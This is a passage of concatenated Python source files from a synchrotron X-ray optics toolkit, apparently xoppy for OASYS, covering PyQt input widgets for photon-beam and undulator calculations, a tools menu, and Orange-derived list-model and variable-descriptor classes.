callback=self.compute) gui.button(box0, self, "Defaults", callback=self.defaults) gui.button(box0, self, "Help", callback=self.help1) self.process_showers() box = gui.widgetBox(self.controlArea, " ",orientation="vertical") idx = -1 #widget index 0 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "energyMin", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 1 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "energyMax", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) self.process_showers() gui.rubber(self.controlArea) def unitLabels(self): return ['Minimum photon energy [eV]', 'Minimum photon energy [eV]'] def unitFlags(self): return ['True', 'True'] def compute(self): print("compute executed.") #table = Table.from_numpy(domain, out) #self.send("xoppy_table",table) def defaults(self): self.resetSettings() self.compute() return def help1(self): print("help pressed.") #xoppy_doc('IC_PhotonBeamPencil') if __name__ == "__main__": app = QApplication(sys.argv) w = OWIC_PhotonBeamPencil() w.show() app.exec() w.saveSettings() ``` #### File: devel/json/xus.py ```python import sys import numpy as np from PyQt4.QtGui import QIntValidator, QDoubleValidator, QApplication, QSizePolicy from PyMca5.PyMcaIO import specfilewrapper as specfile from orangewidget import gui from orangewidget.settings import Setting from oasys.widgets import widget try: from orangecontrib.xoppy.util.xoppy_calc import xoppy_doc except ImportError: print("Error importing: xoppy_doc") raise try: from orangecontrib.xoppy.util.xoppy_calc import xoppy_calc_xus except ImportError: print("compute pressed.") print("Error importing: xoppy_calc_xus") raise class OWxus(widget.OWWidget): name = "xus" id = "orange.widgets.dataxus" description = "xoppy application to compute..." 
icon = "icons/xoppy_xus.png" author = "create_widget.py" maintainer_email = "<EMAIL>" priority = 10 category = "" keywords = ["xoppy", "xus"] outputs = [{"name": "xoppy_data", "type": np.ndarray, "doc": ""}, {"name": "xoppy_specfile", "type": str, "doc": ""}] #inputs = [{"name": "Name", # "type": type, # "handler": None, # "doc": ""}] want_main_area = False TITLE = Setting("APS Undulator A, Beam Parameters for regular lattice nux36nuy39.twi, 1.5% cpl.") ENERGY = Setting(7.0) CUR = Setting(100.0) SIGE = Setting(0.000959999975748) TEXT_MACHINE = Setting("") SIGX = Setting(0.273999989032745) SIGY = Setting(0.010999999940395) SIGX1 = Setting(0.011300000362098) SIGY1 = Setting(0.00359999993816) TEXT_BEAM = Setting("") PERIOD = Setting(3.299999952316284) NP = Setting(70) KX = Setting(0.0) KY = Setting(2.75) TEXT_UNDULATOR = Setting("") EMIN = Setting(1000.0) EMAX = Setting(50000.0) N = Setting(5000) TEXT_ENERGY = Setting("") D = Setting(30.0) XPC = Setting(0.0) YPC = Setting(0.0) XPS = Setting(2.5) YPS = Setting(1.0) NXP = Setting(25) NYP = Setting(10) TEXT_PINHOLE = Setting("") MODE = Setting(2) METHOD = Setting(4) IHARM = Setting(0) TEXT_MODE = Setting("") NPHI = Setting(0) NALPHA = Setting(0) CALPHA2 = Setting(0.0) NOMEGA = Setting(64) COMEGA = Setting(8.0) NSIGMA = Setting(0) TEXT_CALC = Setting("") RUN_MODE_NAME = Setting("foreground") def __init__(self): super().__init__() box0 = gui.widgetBox(self.controlArea, " ",orientation="horizontal") #widget buttons: compute, set defaults, help gui.button(box0, self, "Compute", callback=self.compute) gui.button(box0, self, "Defaults", callback=self.defaults) gui.button(box0, self, "Help", callback=self.help1) self.process_showers() box = gui.widgetBox(self.controlArea, " ",orientation="vertical") idx = -1 #widget index 0 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "TITLE", label=self.unitLabels()[idx], addSpace=True) self.show_at(self.unitFlags()[idx], box1) #widget index 1 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "ENERGY", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 2 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "CUR", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 3 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "SIGE", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 4 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "TEXT_MACHINE", label=self.unitLabels()[idx], addSpace=True) self.show_at(self.unitFlags()[idx], box1) #widget index 5 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "SIGX", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 6 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "SIGY", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 7 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "SIGX1", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 8 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "SIGY1", label=self.unitLabels()[idx], 
addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 9 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "TEXT_BEAM", label=self.unitLabels()[idx], addSpace=True) self.show_at(self.unitFlags()[idx], box1) #widget index 10 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "PERIOD", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 11 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "NP", label=self.unitLabels()[idx], addSpace=True, valueType=int, validator=QIntValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 12 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "KX", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 13 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "KY", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 14 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "TEXT_UNDULATOR", label=self.unitLabels()[idx], addSpace=True) self.show_at(self.unitFlags()[idx], box1) #widget index 15 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "EMIN", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 16 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "EMAX", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 17 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "N", label=self.unitLabels()[idx], addSpace=True, valueType=int, validator=QIntValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 18 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "TEXT_ENERGY", label=self.unitLabels()[idx], addSpace=True) self.show_at(self.unitFlags()[idx], box1) #widget index 19 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "D", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 20 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "XPC", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 21 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "YPC", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 22 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "XPS", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 23 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "YPS", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 24 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "NXP", label=self.unitLabels()[idx], addSpace=True, valueType=int, validator=QIntValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 25 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "NYP", 
label=self.unitLabels()[idx], addSpace=True, valueType=int, validator=QIntValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 26 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "TEXT_PINHOLE", label=self.unitLabels()[idx], addSpace=True) self.show_at(self.unitFlags()[idx], box1) #widget index 27 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "MODE", label=self.unitLabels()[idx], addSpace=True, valueType=int, validator=QIntValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 28 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "METHOD", label=self.unitLabels()[idx], addSpace=True, valueType=int, validator=QIntValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 29 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "IHARM", label=self.unitLabels()[idx], addSpace=True, valueType=int, validator=QIntValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 30 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "TEXT_MODE", label=self.unitLabels()[idx], addSpace=True) self.show_at(self.unitFlags()[idx], box1) #widget index 31 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "NPHI", label=self.unitLabels()[idx], addSpace=True, valueType=int, validator=QIntValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 32 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "NALPHA", label=self.unitLabels()[idx], addSpace=True, valueType=int, validator=QIntValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 33 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "CALPHA2", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 34 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "NOMEGA", label=self.unitLabels()[idx], addSpace=True, valueType=int, validator=QIntValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 35 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "COMEGA", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 36 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "NSIGMA", label=self.unitLabels()[idx], addSpace=True, valueType=int, validator=QIntValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 37 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "TEXT_CALC", label=self.unitLabels()[idx], addSpace=True) self.show_at(self.unitFlags()[idx], box1) #widget index 38 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "RUN_MODE_NAME", label=self.unitLabels()[idx], addSpace=True) self.show_at(self.unitFlags()[idx], box1) gui.rubber(self.controlArea) def unitLabels(self): return ['Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title','Dummy_title'] def unitFlags(self): return 
['True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True','True'] #def unitNames(self): # return ['TITLE','ENERGY','CUR','SIGE','TEXT_MACHINE','SIGX','SIGY','SIGX1','SIGY1','TEXT_BEAM','PERIOD','NP','KX','KY','TEXT_UNDULATOR','EMIN','EMAX','N','TEXT_ENERGY','D','XPC','YPC','XPS','YPS','NXP','NYP','TEXT_PINHOLE','MODE','METHOD','IHARM','TEXT_MODE','NPHI','NALPHA','CALPHA2','NOMEGA','COMEGA','NSIGMA','TEXT_CALC','RUN_MODE_NAME'] def compute(self): fileName = xoppy_calc_xus(TITLE=self.TITLE,ENERGY=self.ENERGY,CUR=self.CUR,SIGE=self.SIGE,TEXT_MACHINE=self.TEXT_MACHINE,SIGX=self.SIGX,SIGY=self.SIGY,SIGX1=self.SIGX1,SIGY1=self.SIGY1,TEXT_BEAM=self.TEXT_BEAM,PERIOD=self.PERIOD,NP=self.NP,KX=self.KX,KY=self.KY,TEXT_UNDULATOR=self.TEXT_UNDULATOR,EMIN=self.EMIN,EMAX=self.EMAX,N=self.N,TEXT_ENERGY=self.TEXT_ENERGY,D=self.D,XPC=self.XPC,YPC=self.YPC,XPS=self.XPS,YPS=self.YPS,NXP=self.NXP,NYP=self.NYP,TEXT_PINHOLE=self.TEXT_PINHOLE,MODE=self.MODE,METHOD=self.METHOD,IHARM=self.IHARM,TEXT_MODE=self.TEXT_MODE,NPHI=self.NPHI,NALPHA=self.NALPHA,CALPHA2=self.CALPHA2,NOMEGA=self.NOMEGA,COMEGA=self.COMEGA,NSIGMA=self.NSIGMA,TEXT_CALC=self.TEXT_CALC,RUN_MODE_NAME=self.RUN_MODE_NAME) #send specfile if fileName == None: print("Nothing to send") else: self.send("xoppy_specfile",fileName) sf = specfile.Specfile(fileName) if sf.scanno() == 1: #load spec file with one scan, # is comment print("Loading file: ",fileName) out = np.loadtxt(fileName) print("data shape: ",out.shape) #get labels txt = open(fileName).readlines() tmp = [ line.find("#L") for line in txt] itmp = np.where(np.array(tmp) != (-1)) labels = txt[itmp[0]].replace("#L ","").split(" ") print("data labels: ",labels) self.send("xoppy_data",out) else: print("File %s contains %d scans. 
Cannot send it as xoppy_table"%(fileName,sf.scanno())) def defaults(self): self.resetSettings() self.compute() return def help1(self): print("help pressed.") xoppy_doc('xus') if __name__ == "__main__": app = QApplication(sys.argv) w = OWxus() w.show() app.exec() w.saveSettings() ``` #### File: xoppy/menu/xoppy_tools_menu.py ```python from PyQt5 import QtWidgets from oasys.menus.menu import OMenu class XoppyToolsMenu(OMenu): def __init__(self): super().__init__(name="Xoppy Tools") self.addSubMenu("Xoppy Tool 1") self.addSubMenu("Xoppy Tool 2") self.addSeparator() self.addSubMenu("Xoppy Tool 3") def executeAction_1(self, action): self.showWarningMessage("Xoppy Tool 1") def executeAction_2(self, action): self.showWarningMessage("Xoppy Tool 2") def executeAction_3(self, action): self.showWarningMessage("Xoppy Tool 3") def showConfirmMessage(self, message): msgBox = QtWidgets.QMessageBox() msgBox.setIcon(QtWidgets.QMessageBox.Question) msgBox.setText(message) msgBox.setInformativeText( "Element will be omitted.\nDo you want to continue importing procedure (a broken link will appear)?") msgBox.setStandardButtons(QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No) msgBox.setDefaultButton(QtWidgets.QMessageBox.No) ret = msgBox.exec_() return ret def showWarningMessage(self, message): msgBox = QtWidgets.QMessageBox() msgBox.setIcon(QtWidgets.QMessageBox.Warning) msgBox.setText(message) msgBox.setStandardButtons(QtWidgets.QMessageBox.Ok) msgBox.exec_() def showCriticalMessage(self, message): msgBox = QtWidgets.QMessageBox() msgBox.setIcon(QtWidgets.QMessageBox.Critical) msgBox.setText(message) msgBox.setStandardButtons(QtWidgets.QMessageBox.Ok) msgBox.exec_() ``` #### File: util/script/itemmodels.py ```python import pickle from contextlib import contextmanager from PyQt5.QtCore import Qt, QAbstractListModel, QModelIndex, QByteArray, QItemSelectionModel from PyQt5.QtCore import pyqtSignal as Signal from PyQt5.QtWidgets import ( QWidget, QBoxLayout, QToolButton, QAbstractButton, QAction ) from orangecontrib.xoppy.util.script.variable import ( Variable, DiscreteVariable, ContinuousVariable, StringVariable ) from orangewidget import gui class _store(dict): pass def _argsort(seq, cmp=None, key=None, reverse=False): if key is not None: items = sorted(enumerate(seq), key=lambda i, v: key(v)) elif cmp is not None: items = sorted(enumerate(seq), cmp=lambda a, b: cmp(a[1], b[1])) else: items = sorted(enumerate(seq), key=seq.__getitem__) if reverse: items = reversed(items) return items @contextmanager def signal_blocking(obj): blocked = obj.signalsBlocked() obj.blockSignals(True) yield obj.blockSignals(blocked) def _as_contiguous_range(start, stop, step): if step == -1: # Equivalent range with positive step start, stop = stop + 1, start + 1 elif not (step == 1 or step is None): raise IndexError("Non-contiguous range.") return start, stop, step class PyListModel(QAbstractListModel): """ A model for displaying python list like objects in Qt item view classes """ MIME_TYPES = ["application/x-Orange-PyListModelData"] def __init__(self, iterable=None, parent=None, flags=Qt.ItemIsSelectable | Qt.ItemIsEnabled, list_item_role=Qt.DisplayRole, supportedDropActions=Qt.MoveAction): super().__init__(parent) self._list = [] self._other_data = [] self._flags = flags self.list_item_role = list_item_role self._supportedDropActions = supportedDropActions if iterable is not None: self.extend(iterable) def _is_index_valid_for(self, index, list_like): if isinstance(index, QModelIndex) and index.isValid(): row, column = 
index.row(), index.column() return 0 <= row < len(list_like) and not column elif isinstance(index, int): return -len(self) < index < len(list_like) else: return False def wrap(self, lst): """ Wrap the list with this model. All changes to the model are done in place on the passed list """ self._list = lst self._other_data = [_store() for _ in lst] self.reset() # noinspection PyMethodOverriding def index(self, row, column=0, parent=QModelIndex()): if self._is_index_valid_for(row, self) and column == 0: return QAbstractListModel.createIndex(self, row, column, parent) else: return QModelIndex() def headerData(self, section, orientation, role=Qt.DisplayRole): if role == Qt.DisplayRole: return str(section) # noinspection PyMethodOverriding def rowCount(self, parent=QModelIndex()): return 0 if parent.isValid() else len(self) def columnCount(self, parent=QModelIndex()): return 0 if parent.isValid() else 1 def data(self, index, role=Qt.DisplayRole): row = index.row() if role in [self.list_item_role, Qt.EditRole] \ and self._is_index_valid_for(index, self): return self[row] elif self._is_index_valid_for(row, self._other_data): return self._other_data[row].get(role, None) def itemData(self, index): mapping = QAbstractListModel.itemData(self, index) if self._is_index_valid_for(index, self._other_data): items = list(self._other_data[index.row()].items()) else: items = [] for key, value in items: mapping[key] = value return mapping def parent(self, index=QModelIndex()): return QModelIndex() def setData(self, index, value, role=Qt.EditRole): if role == Qt.EditRole and self._is_index_valid_for(index, self): self[index.row()] = value # Will emit proper dataChanged signal return True elif self._is_index_valid_for(index, self._other_data): self._other_data[index.row()][role] = value self.dataChanged.emit(index, index) return True else: return False def setItemData(self, index, data): data = dict(data) with signal_blocking(self): for role, value in data.items(): if role == Qt.EditRole and \ self._is_index_valid_for(index, self): self[index.row()] = value elif self._is_index_valid_for(index, self._other_data): self._other_data[index.row()][role] = value self.dataChanged.emit(index, index) return True def flags(self, index): if self._is_index_valid_for(index, self._other_data): return self._other_data[index.row()].get("flags", self._flags) else: return self._flags | Qt.ItemIsDropEnabled # noinspection PyMethodOverriding def insertRows(self, row, count, parent=QModelIndex()): """ Insert ``count`` rows at ``row``, the list fill be filled with ``None`` """ if not parent.isValid(): self[row:row] = [None] * count return True else: return False # noinspection PyMethodOverriding def removeRows(self, row, count, parent=QModelIndex()): """Remove ``count`` rows starting at ``row`` """ if not parent.isValid(): del self[row:row + count] return True else: return False def extend(self, iterable): list_ = list(iterable) self.beginInsertRows(QModelIndex(), len(self), len(self) + len(list_) - 1) self._list.extend(list_) self._other_data.extend([_store() for _ in list_]) self.endInsertRows() def append(self, item): self.extend([item]) def insert(self, i, val): self.beginInsertRows(QModelIndex(), i, i) self._list.insert(i, val) self._other_data.insert(i, _store()) self.endInsertRows() def remove(self, val): i = self._list.index(val) self.__delitem__(i) def pop(self, i): item = self._list[i] self.__delitem__(i) return item def __len__(self): return len(self._list) def __iter__(self): return iter(self._list) def __getitem__(self, 
i): return self._list[i] def __add__(self, iterable): new_list = PyListModel(list(self._list), self.parent(), flags=self._flags, list_item_role=self.list_item_role, supportedDropActions=self.supportedDropActions() ) new_list._other_data = list(self._other_data) new_list.extend(iterable) return new_list def __iadd__(self, iterable): self.extend(iterable) return self def __delitem__(self, s): if isinstance(s, slice): start, stop, step = s.indices(len(self)) start, stop, step = _as_contiguous_range(start, stop, step) self.beginRemoveRows(QModelIndex(), start, stop - 1) else: s = len(self) + s if s < 0 else s self.beginRemoveRows(QModelIndex(), s, s) del self._list[s] del self._other_data[s] self.endRemoveRows() def __setitem__(self, s, value): if isinstance(s, slice): start, stop, step = s.indices(len(self)) start, stop, step = _as_contiguous_range(start, stop, step) self.__delitem__(slice(start, stop, step)) if not isinstance(value, list): value = list(value) self.beginInsertRows(QModelIndex(), start, start + len(value) - 1) self._list[s] = value self._other_data[s] = (_store() for _ in value) self.endInsertRows() else: s = len(self) + s if s < 0 else s self._list[s] = value self._other_data[s] = _store() self.dataChanged.emit(self.index(s), self.index(s)) def reverse(self): self._list.reverse() self._other_data.reverse() self.dataChanged.emit(self.index(0), self.index(len(self) - 1)) def sort(self, *args, **kwargs): indices = _argsort(self._list, *args, **kwargs) # _argsort yields (index, value) pairs lst = [self._list[i] for i, _ in indices] other = [self._other_data[i] for i, _ in indices] for i, (new_l, new_o) in enumerate(zip(lst, other)): self._list[i] = new_l self._other_data[i] = new_o self.dataChanged.emit(self.index(0), self.index(len(self) - 1)) def __repr__(self): return "PyListModel(%s)" % repr(self._list) def __bool__(self): return len(self) != 0 def emitDataChanged(self, indexList): if isinstance(indexList, int): indexList = [indexList] #TODO: group indexes into ranges for ind in indexList: self.dataChanged.emit(self.index(ind), self.index(ind)) ########### # Drag/drop ########### def supportedDropActions(self): return self._supportedDropActions def mimeTypes(self): return self.MIME_TYPES + list(QAbstractListModel.mimeTypes(self)) def mimeData(self, indexlist): if len(indexlist) <= 0: return None items = [self[i.row()] for i in indexlist] mime = QAbstractListModel.mimeData(self, indexlist) data = pickle.dumps(items) mime.setData(self.MIME_TYPES[0], QByteArray(data)) mime._items = items return mime def dropMimeData(self, mime, action, row, column, parent): if action == Qt.IgnoreAction: return True if not mime.hasFormat(self.MIME_TYPES[0]): return False if hasattr(mime, "_items"): items = mime._items else: desc = str(mime.data(self.MIME_TYPES[0])) items = pickle.loads(desc) return QAbstractListModel.dropMimeData( self, mime, action, row, column, parent) class VariableListModel(PyListModel): MIME_TYPE = "application/x-Orange-VariableList" def data(self, index, role=Qt.DisplayRole): if self._is_index_valid_for(index, self): var = self[index.row()] if not isinstance(var, Variable): return super().data(index, role) elif role == Qt.DisplayRole: return var.name elif role == Qt.DecorationRole: return gui.attributeIconDict[var] elif role == Qt.ToolTipRole: return self.variable_tooltip(var) else: return PyListModel.data(self, index, role) def variable_tooltip(self, var): if isinstance(var, DiscreteVariable): return self.discrete_variable_tooltip(var) elif isinstance(var, ContinuousVariable): return self.continuous_variable_toltip(var) elif isinstance(var,
StringVariable): return self.string_variable_tooltip(var) def variable_labels_tooltip(self, var): text = "" if var.attributes: items = [(safe_text(key), safe_text(value)) for key, value in var.attributes.items()] labels = list(map("%s = %s".__mod__, items)) text += "<br/>Variable Labels:<br/>" text += "<br/>".join(labels) return text def discrete_variable_tooltip(self, var): text = "<b>%s</b><br/>Discrete with %i values: " %\ (safe_text(var.name), len(var.values)) text += ", ".join("%r" % safe_text(v) for v in var.values) text += self.variable_labels_tooltip(var) return text def continuous_variable_toltip(self, var): text = "<b>%s</b><br/>Continuous" % safe_text(var.name) text += self.variable_labels_tooltip(var) return text def string_variable_tooltip(self, var): text = "<b>%s</b><br/>String" % safe_text(var.name) text += self.variable_labels_tooltip(var) return text def python_variable_tooltip(self, var): text = "<b>%s</b><br/>Python" % safe_text(var.name) text += self.variable_labels_tooltip(var) return text _html_replace = [("<", "&lt;"), (">", "&gt;")] def safe_text(text): for old, new in _html_replace: text = text.replace(old, new) return text class ListSingleSelectionModel(QItemSelectionModel): """ Item selection model for list item models with single selection. Defines signal: - selectedIndexChanged(QModelIndex) """ selectedIndexChanged = Signal(QModelIndex) def __init__(self, model, parent=None): QItemSelectionModel.__init__(self, model, parent) self.selectionChanged.connect(self.onSelectionChanged) def onSelectionChanged(self, new, _): index = list(new.indexes()) if index: index = index.pop() else: index = QModelIndex() self.selectedIndexChanged.emit(index) def selectedRow(self): """ Return QModelIndex of the selected row or invalid if no selection. """ rows = self.selectedRows() if rows: return rows[0] else: return QModelIndex() def select(self, index, flags=QItemSelectionModel.ClearAndSelect): if isinstance(index, int): index = self.model().index(index) return QItemSelectionModel.select(self, index, flags) def select_row(view, row): """ Select a `row` in an item view. """ selmodel = view.selectionModel() selmodel.select(view.model().index(row, 0), QItemSelectionModel.ClearAndSelect | QItemSelectionModel.Rows) class ModelActionsWidget(QWidget): def __init__(self, actions=None, parent=None, direction=QBoxLayout.LeftToRight): QWidget.__init__(self, parent) self.actions = [] self.buttons = [] layout = QBoxLayout(direction) layout.setContentsMargins(0, 0, 0, 0) self.setContentsMargins(0, 0, 0, 0) self.setLayout(layout) if actions is not None: for action in actions: self.addAction(action) self.setLayout(layout) def actionButton(self, action): if isinstance(action, QAction): button = QToolButton(self) button.setDefaultAction(action) return button elif isinstance(action, QAbstractButton): return action def insertAction(self, ind, action, *args): button = self.actionButton(action) self.layout().insertWidget(ind, button, *args) self.buttons.insert(ind, button) self.actions.insert(ind, action) return button def addAction(self, action, *args): return self.insertAction(-1, action, *args) ``` #### File: util/script/variable.py ```python from math import isnan, floor from numbers import Real from orangecontrib.shadow.util.script.value import Value, Unknown import collections ValueUnknown = Unknown # Shadowing within classes class Variable: """ The base class for variable descriptors contains the variable's name and some basic properties. .. attribute:: name The name of the variable. .. 
attribute:: unknown_str A set of values that represent unknowns in conversion from textual formats. Default is `{"?", ".", "", "NA", "~", None}`. .. attribute:: compute_value A function for computing the variable's value when converting from another domain which does not contain this variable. The base class defines a static method `compute_value`, which returns `Unknown`. Non-primitive variables must redefine it to return `None`. .. attribute:: source_variable An optional descriptor of the source variable - if any - from which this variable is derived and computed via :obj:`compute_value`. .. attribute:: attributes A dictionary with user-defined attributes of the variable """ _DefaultUnknownStr = {"?", ".", "", "NA", "~", None} _variable_types = [] Unknown = ValueUnknown def __init__(self, name="", compute_value=None): """ Construct a variable descriptor. """ self.name = name if compute_value is not None: self.compute_value = compute_value self.unknown_str = set(Variable._DefaultUnknownStr) self.source_variable = None self.attributes = {} @staticmethod def is_primitive(): """ `True` if the variable's values are stored as floats. Primitive variables are :obj:`~data.DiscreteVariable` and :obj:`~data.ContinuousVariable`. Non-primitive variables can appear in the data only as meta attributes. Derived classes must overload the function. """ raise RuntimeError("variable descriptors must overload is_primitive()") def repr_val(self, val): """ Return a textual representation of variable's value `val`. Argument `val` must be a float (for primitive variables) or an arbitrary Python object (for non-primitives). Derived classes must overload the function. """ raise RuntimeError("variable descriptors must overload repr_val()") str_val = repr_val def to_val(self, s): """ Convert the given argument to a value of the variable. The argument can be a string, a number or `None`. For primitive variables, the base class provides a method that returns :obj:`~Orange.data.value.Unknown` if `s` is found in :obj:`~Orange.data.Variable.unknown_str`, and raises an exception otherwise. For non-primitive variables it returns the argument itself. Derived classes of primitive variables must overload the function. :param s: value, represented as a number, string or `None` :type s: str, float or None :rtype: float or object """ if not self.is_primitive(): return s if s in self.unknown_str: return Unknown raise RuntimeError( "primitive variable descriptors must overload to_val()") def val_from_str_add(self, s): """ Convert the given string to a value of the variable. The method is similar to :obj:`to_val` except that it only accepts strings and that it adds new values to the variable's domain where applicable. The base class method calls `to_val`. :param s: symbolic representation of the value :type s: str :rtype: float or object """ return self.to_val(s) def __str__(self): """ Return a representation of the variable, like, `'DiscreteVariable("gender")'`. Derived classes may overload this method to provide a more informative representation. """ return "{}('{}')".format(self.__class__.__name__, self.name) __repr__ = __str__ @staticmethod def compute_value(_): return Unknown @classmethod def _clear_cache(cls): for tpe in cls._variable_types: tpe._clear_cache() class ContinuousVariable(Variable): """ Descriptor for continuous variables. .. attribute:: number_of_decimals The number of decimals when the value is printed out (default: 3). .. 
attribute:: adjust_decimals

        A flag regulating whether the `number_of_decimals` is being adjusted
        by :obj:`to_val`.

        The value of `number_of_decimals` is set to 3 and `adjust_decimals`
        is set to 2. When :obj:`val_from_str_add` is called for the first
        time with a string as an argument, `number_of_decimals` is set to
        the number of decimals in the string and `adjust_decimals` is set
        to 1. In the subsequent calls of `to_val`, the number of decimals is
        increased if the string argument has a larger number of decimals.

        If the `number_of_decimals` is set manually, `adjust_decimals` is
        set to 0 to prevent changes by `to_val`.
    """

    all_continuous_vars = {}

    def __init__(self, name="", number_of_decimals=None):
        """
        Construct a new continuous variable. The number of decimals is set
        to three, but adjusted at the first call of :obj:`to_val`.
        """
        super().__init__(name)
        if number_of_decimals is None:
            self.number_of_decimals = 3
            self.adjust_decimals = 2
        else:
            self.number_of_decimals = number_of_decimals
        ContinuousVariable.all_continuous_vars[name] = self

    @property
    def number_of_decimals(self):
        return self._number_of_decimals

    # noinspection PyAttributeOutsideInit
    @number_of_decimals.setter
    def number_of_decimals(self, x):
        self._number_of_decimals = x
        self.adjust_decimals = 0
        self._out_format = "%.{}f".format(self.number_of_decimals)

    @staticmethod
    def make(name):
        """
